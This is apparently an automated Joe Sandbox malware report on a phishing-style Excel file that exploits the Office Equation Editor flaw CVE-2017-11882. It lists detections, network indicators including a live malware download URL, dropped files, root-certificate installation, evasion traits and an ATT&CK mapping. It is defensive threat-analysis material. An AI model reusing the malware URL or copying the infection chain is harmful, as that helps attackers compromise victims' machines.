Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Swift Advice-398379.xlsx

Overview

General Information

Sample name:Payment Swift Advice-398379.xlsx
Analysis ID:1585849
MD5:3726a7b56e7d8ca120457d55cfda15eb
SHA1:fa39713e50dcaf460e17020d124cc9fffd92342f
SHA256:0a5a10b580a5060cd9621d9bb5002bb9b9ed6e2d1cc62bbb6a2d269201de76fc
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3236 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3384 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x2c2:$s1: <legacyDrawing r:id="
  • 0x2ea:$s2: <oleObject progId="
  • 0x338:$s3: autoLoad="true"

Exploits

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3384, TargetFilename: C:\Users\user\AppData\Roaming\mbnjbn.exe

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.155.138.21, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3384, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T11:06:20.825421+010020197142Potentially Bad Traffic192.168.2.2249161104.155.138.21443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Payment Swift Advice-398379.xlsxAvira: detected
Source: https://www.djmarket.co.uk/dea.exewAvira URL Cloud: Label: malware
Source: https://www.djmarket.co.uk/dea.exeAvira URL Cloud: Label: malware
Source: Payment Swift Advice-398379.xlsxVirustotal: Detection: 69%Perma Link
Source: Payment Swift Advice-398379.xlsxReversingLabs: Detection: 72%

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.155.138.21 Port: 443Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownHTTPS traffic detected: 104.155.138.21:443 -> 192.168.2.22:49161 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035504D2 LoadLibraryW,2_2_035504D2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506EA WinExec,ExitProcess,2_2_035506EA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0355049B CreateFileW,2_2_0355049B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550449 CreateFileW,2_2_03550449
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035503ED ExitProcess,CreateFileW,2_2_035503ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550406 CreateFileW,2_2_03550406
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550488 CreateFileW,2_2_03550488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0355070A ExitProcess,2_2_0355070A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550637 WinExec,ExitProcess,2_2_03550637
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550422 CreateFileW,2_2_03550422
Source: global trafficDNS query: name: www.djmarket.co.uk
Source: global trafficDNS query: name: www.djmarket.co.uk
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.155.138.21:443
Source: global trafficTCP traffic: 104.155.138.21:443 -> 192.168.2.22:49161
Source: global trafficHTTP traffic detected: GET /dea.exe HTTP/1.1Connection: Keep-AliveHost: www.djmarket.co.uk
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 104.155.138.21:443
Source: unknownHTTPS traffic detected: 104.155.138.21:443 -> 192.168.2.22:49161 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /dea.exe HTTP/1.1Connection: Keep-AliveHost: www.djmarket.co.uk
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: www.djmarket.co.uk
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000002.00000002.393056400.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.393056400.00000000005E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.djmarket.co.uk/dea.exe
Source: EQNEDT32.EXE, 00000002.00000002.393056400.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.djmarket.co.uk/dea.exew
Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: classification engineClassification label: mal100.expl.winXLSX@3/1@2/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Payment Swift Advice-398379.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7992.tmpJump to behavior
Source: Payment Swift Advice-398379.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Payment Swift Advice-398379.xlsxVirustotal: Detection: 69%
Source: Payment Swift Advice-398379.xlsxReversingLabs: Detection: 72%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Payment Swift Advice-398379.xlsxInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Payment Swift Advice-398379.xlsxInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Payment Swift Advice-398379.xlsxInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3404Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1924
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-2062
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550711 mov edx, dword ptr fs:[00000030h]2_2_03550711
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts33
Exploitation for Client Execution
1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Query Registry
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Modify Registry
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Install Root Certificate
LSA Secrets3
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Payment Swift Advice-398379.xlsx70%VirustotalBrowse
Payment Swift Advice-398379.xlsx72%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
Payment Swift Advice-398379.xlsx100%AviraEXP/CVE-2017-11882.Gen
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.djmarket.co.uk/dea.exew100%Avira URL Cloudmalware
https://www.djmarket.co.uk/dea.exe100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
www.djmarket.co.uk
104.155.138.21
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://www.djmarket.co.uk/dea.exefalse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      https://www.djmarket.co.uk/dea.exewEQNEDT32.EXE, 00000002.00000002.393056400.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.393056400.000000000060E000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.155.138.21
                    www.djmarket.co.ukUnited States
                    15169GOOGLEUSfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1585849
                    Start date and time:2025-01-08 11:05:09 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Payment Swift Advice-398379.xlsx
                    Detection:MAL
                    Classification:mal100.expl.winXLSX@3/1@2/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 11
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    05:06:18API Interceptor11x Sleep call for process: EQNEDT32.EXE modified
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    05af1f5ca1b87cc9cc9b25185115607dILxa85qCjP.jsGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    Pago.xlsGet hashmaliciousAveMaria, UACMeBrowse
                    • 104.155.138.21
                    NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    rcNDmdah2W.docGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    SLNA_Updated_Medical_Grant_Application(1).docxGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    CMR ART009.docxGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                    • 104.155.138.21
                    Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    510005940.docx.docGet hashmaliciousUnknownBrowse
                    • 104.155.138.21
                    No context
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.98769715692453
                    TrID:
                    • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                    • ZIP compressed archive (8000/1) 18.60%
                    File name:Payment Swift Advice-398379.xlsx
                    File size:67'456 bytes
                    MD5:3726a7b56e7d8ca120457d55cfda15eb
                    SHA1:fa39713e50dcaf460e17020d124cc9fffd92342f
